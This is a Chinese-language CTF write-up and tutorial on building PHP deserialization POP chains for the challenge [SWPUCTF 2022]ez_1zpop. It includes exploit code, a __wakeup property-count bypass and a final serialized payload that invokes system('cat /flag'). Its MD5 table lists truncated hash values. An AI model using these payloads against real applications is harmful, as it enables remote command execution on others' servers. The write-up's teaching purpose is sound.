新手也能懂的PHP反序列化POP链:从CTF题[SWPUCTF 2022]ez_1zpop讲起
PHP反序列化POP链入门:从零构建攻击链的积木思维
第一次接触PHP反序列化漏洞时,那些神秘的魔术方法和复杂的调用链总让人望而生畏。但当我真正理解其中的逻辑后,发现这就像小时候玩的积木游戏——只要找到正确的模块和连接方式,就能搭建出意想不到的结构。今天我们就用这种积木思维,通过一道典型的CTF题目[SWPUCTF 2022]ez_1zpop,带你走进POP链构造的世界。
1. 认识POP链的基本组件
POP链(Property-Oriented Programming Chain)本质上是一系列对象属性和方法的巧妙组合,通过反序列化过程触发特定的代码执行路径。就像搭积木需要了解每块积木的特性一样,构建POP链需要掌握几个核心组件:
1.1 魔术方法:POP链的触发器
PHP中的魔术方法会在特定事件发生时自动调用,它们就像积木上的连接点:
__construct():对象创建时触发(相当于积木刚拆包装)__destruct():对象销毁时触发(相当于拆除积木的最后一步)__wakeup():反序列化时触发(相当于从图纸重建积木)__toString():对象被当作字符串使用时触发(相当于把积木当作字母使用)
在ez_1zpop题目中,lt类的__destruct()方法会调用__toString(),这就是我们链条的起点。
1.2 关键属性:POP链的传动轴
类属性在POP链中扮演着传递控制的角色:
class lt { public $impo; // 这个属性将成为连接不同类的关键 public $md51; public $md52; }通过精心设置这些属性值,我们可以让程序执行流按照我们设计的路径流动。
1.3 漏洞点:POP链的终点站
每个有效的POP链都需要一个最终执行点,通常是可以执行代码的地方。在ez_1zpop中,fin类的fmm()方法中存在动态函数调用:
function fmm() { $b = $this->a; $b($this->title); // 这里可以执行任意命令 }2. 搭建POP链的积木步骤
2.1 确定链条的头尾
构建POP链就像规划积木建筑的入口和出口:
- 头部:通常是自动触发的魔术方法(如
__destruct()) - 尾部:最终执行代码的位置(如
fmm()中的动态调用)
在ez_1zpop中:
- 头部:
lt::__destruct()→lt::__toString() - 尾部:
fin::fmm()
2.2 连接中间模块
我们需要让执行流从头部顺利流向尾部。观察__toString()中的条件:
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52) { return $this->impo->fmm(); }这需要满足三个条件:
impo属性已设置md51和md52的MD5值相同但原始值不同impo对象有fmm()方法
2.3 解决MD5比较问题
PHP的弱类型比较允许我们使用"0e"开头的MD5值绕过:
| 字符串 | MD5值 | 特性 |
|---|---|---|
| s155964671a | 0e224554469 | 科学计数法视为0 |
| s214587387a | 0e848240448 | 科学计数法视为0 |
这两个字符串的MD5值在弱比较(==)下相等,但原始值不同。
3. 完整POP链构造实战
现在我们把所有积木块组装起来:
3.1 创建恶意对象结构
<?php class lt { public $impo; public $md51 = 's155964671a'; public $md52 = 's214587387a'; } class fin { public $a = 'system'; public $title = 'cat /flag'; } $fin = new fin(); $lt = new lt(); $lt->impo = $fin; // 连接关键节点 echo serialize($lt); ?>这段代码会输出序列化后的POP链。
3.2 绕过__wakeup限制
题目中的__wakeup()会重置impo属性,我们需要通过修改属性数量来绕过:
原始序列化:
O:2:"lt":3:{...}修改为(将属性计数改为4):
O:2:"lt":4:{...}3.3 最终Payload构造
将生成的序列化字符串进行URL编码后作为NSS参数传递:
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":2:{s:1:"a";s:6:"system";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}4. POP链的调试技巧
在实际构造过程中,可能会遇到各种意外情况。以下是几个实用的调试方法:
- 逐步验证:先测试MD5比较是否通过,再测试方法调用
- 错误日志:开启PHP错误报告查看执行路径
- 替代函数:先用
var_dump代替危险函数测试执行流 - 属性跟踪:添加临时属性记录执行状态
// 调试示例 class lt { public $debug = ''; function __toString() { $this->debug .= "到达__toString\n"; // ...原有代码... } }记住,构建POP链就像玩解谜游戏——需要耐心尝试不同的组合方式。当我在第一次成功构造出完整链条时,那种"啊哈!"的顿悟时刻正是安全研究的魅力所在。